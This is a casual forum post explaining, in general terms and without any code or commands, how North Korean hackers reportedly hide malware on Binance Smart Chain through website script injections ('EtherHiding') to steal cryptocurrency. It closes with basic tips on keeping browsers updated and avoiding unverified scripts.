North Korean Hackers Exploit EtherHiding for Malware Attacks and Cryptocurrency Theft

[johny899]

Are you aware of EtherHiding? It is a smart and cunning tactic that North Korean hackers use to steal cryptocurrency and install malware. This is not your average phishing email scheme. Hackers carry out their hijinks by putting malicious code in the Binance Smart Chain (BSC), all to avoid detection from normal security tools - wild, right?

How EtherHiding works​

So, how does it work? Hackers put small bits of code on trusted websites that reference malware being loaded from the blockchain itself. That means this type of attack is becoming increasingly easier to evade detection due to unsuspecting users having some type of plausible deniability, since the malware is being loaded from a trusted third-party site. Malicious code injections usually happen through browser JavaScript scripts, which is why your attack vector is unnoticeable before you are already infected.

Here are some of their clever tactics:

• Scripts that auto-update, altering their behavior in the moment.
• Using blockchain transactions to hide their malware, making these transactions impossible to blacklist.
• Attacking browser extensions, hot wallets, and De-Fi applications -- basically anywhere crypto is stored.

I will say, the arrogance of using the blockchain itself as a hiding place is staggeringly corny, even for criminals.

Why Is This Important​

This is not just some tech wizardry for wizardry's sake, it is malicious. Security teams are constantly auditing the websites and cloud systems of companies that handle crypto wallets, exchanges, or even De-Fi applications. There's always the chance an easy mistake allows EtherHiding malware to crawl through, even a small one. Can you imagine diligently securing your crypto, only to have a malicious script hide on the blockchain to reclaim all of your crypto. Tough.

Even more frightening is that these hackers can target anyone from a small crypto investor to large DeFi platforms. Their malware is hidden in a decentralized system like BSC, and traditional cybersecurity defense has no chance of keeping up.

Ways to Protect Yourself​

There is not a “magic bullet” to completely eliminate EtherHiding, but there are steps you can take to protect yourself:

• Keep your browsers and extensions continually updated.
• Do not click on any unfamiliar links or download unverified scripts.
• Get real-time monitoring and audits of blockchain security protection if you provide crypto services.

In Conclusion​

It is just incredible how creative cybercriminals have been becoming when it comes to theft of cryptocurrency. We could refer to it as a digital game of cat-and-mouse, and the attackers get better at playing it very quickly. This is must-see technology if you are or will be involved in cryptocurrency in any way, or you enjoy hearing about technology trends. It's a reminder that technology can both lead to completely amazing innovations, and horrific crimes, and often the difference is simply the other side of the knife blade.